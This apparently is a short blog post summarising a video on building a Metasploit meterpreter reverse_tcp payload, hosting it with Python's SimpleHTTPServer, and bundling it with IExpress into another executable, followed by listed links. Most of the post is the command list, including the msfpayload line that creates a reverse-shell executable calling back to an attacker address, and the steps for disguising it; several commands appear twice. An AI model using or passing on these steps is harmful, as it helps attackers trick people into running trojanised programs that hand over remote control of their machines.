This is the second time I’ve seen this on the web – this time it’s on YouTube. It’s pertinent though, since I’ve packaged other executables in the calculator executable, this one is an eye opener. Take a look and let me know what you think.
Commands from video:
* ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
* (For python 2.4+) python -m SimpleHTTPServer
* (For python 2.3 -) python -c “from SimpleHTTPServer import test; test()”
* Start -> Run -> iexpress
* Run multi/hander from command line (not shown in video)
* (For python 2.4+) python -m SimpleHTTPServer
* (For python 2.3 -) python -c “from SimpleHTTPServer import test; test()”
* Start -> Run -> iexpress
* Run multi/hander from command line (not shown in video)
Links from video:
* http://www.metasploit.com/
* http://www.shell-fu.org/
* http://www.microsoft.com/technet/prodtechnol/ie/ieak/techinfo/deploy/60/en/iexpress.mspx?mfr=true
* http://www.virustotal.com/
* http://www.theacademypro.com/
* http://www.theacademyhome.com/



